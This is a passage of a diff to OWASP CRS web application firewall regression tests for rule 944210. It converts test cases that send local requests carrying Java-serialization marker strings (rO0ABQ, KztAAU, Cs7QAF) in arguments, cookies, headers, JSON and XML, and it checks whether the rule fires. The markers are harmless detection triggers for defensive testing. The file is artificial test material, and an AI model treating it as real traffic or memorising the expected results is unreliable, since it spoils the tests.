"en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"rO0ABQ": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-15 + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 15 desc: "Content-Type multipart/form-data json arg value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"rO0ABQ": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-16 + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 16 desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - rO0ABQ - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-17 + rO0ABQ + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - rO0ABQ - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-18 + rO0ABQ + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 18 desc: "Argument test includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log: + expect_ids: [944210] + - test_id: 19 desc: "Argument name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "KztAAU=test" - output: - log_contains: "id \"944210\"" - - test_title: 944210-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "KztAAU=test" + output: + log: + expect_ids: [944210] + - test_id: 20 desc: "Cookie test includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=KztAAU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=KztAAU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 21 desc: "Cookie name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: KztAAU=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: KztAAU=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 22 desc: "Request header test includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: KztAAU - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: KztAAU + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 23 desc: "XML element includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944210] + - test_id: 24 desc: "XML attribute name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944210] + - test_id: 25 desc: "XML attribute value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944210] + - test_id: 26 desc: "XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "KztAAU" + output: + log: + expect_ids: [944210] + - test_id: 27 desc: "Nested XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "KztAAU" + output: + log: + expect_ids: [944210] + - test_id: 28 desc: "Content-Type text/plain includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=KztAAU" - output: - log_contains: "id \"944210\"" - - test_title: 944210-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log: + expect_ids: [944210] + - test_id: 29 desc: "Content-Type application/json arg value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"KztAAU\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"KztAAU\"}" + output: + log: + expect_ids: [944210] + - test_id: 30 desc: "Content-Type application/json arg name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"KztAAU\": \"test\"}" - output: - log_contains: "id \"944210\"" - - test_title: 944210-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"KztAAU\": \"test\"}" + output: + log: + expect_ids: [944210] + - test_id: 31 desc: "Content-Type multipart/form-data json arg name includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"KztAAU": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-32 + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 32 desc: "Content-Type multipart/form-data json arg value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"KztAAU": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-33 + {"KztAAU": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 33 desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - KztAAU - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-34 + KztAAU + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 34 desc: "Content-Type multipart/form-data XML element value includes keyword KztAAU" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - KztAAU - -----------------------------thisissparta-- - output: - log_contains: "id \"944210\"" - - test_title: 944210-35 + KztAAU + -----------------------------thisissparta-- + output: + log: + expect_ids: [944210] + - test_id: 35 desc: "Argument test includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=Cs7QAF" - output: - log_contains: "id \"944210\"" - - test_title: 944210-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=Cs7QAF" + output: + log: + expect_ids: [944210] + - test_id: 36 desc: "Argument name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "Cs7QAF=test" - output: - log_contains: "id \"944210\"" - - test_title: 944210-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "Cs7QAF=test" + output: + log: + expect_ids: [944210] + - test_id: 37 desc: "Cookie test includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Cs7QAF - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Cs7QAF + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 38 desc: "Cookie name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Cs7QAF=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Cs7QAF=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 39 desc: "Request header test includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Cs7QAF - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" - - test_title: 944210-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Cs7QAF + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944210] + - test_id: 40 desc: "XML element includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944210\"" - - test_title: 944210-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944210] + - test_id: 41 desc: "XML attribute name includes keyword Cs7QAF" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - 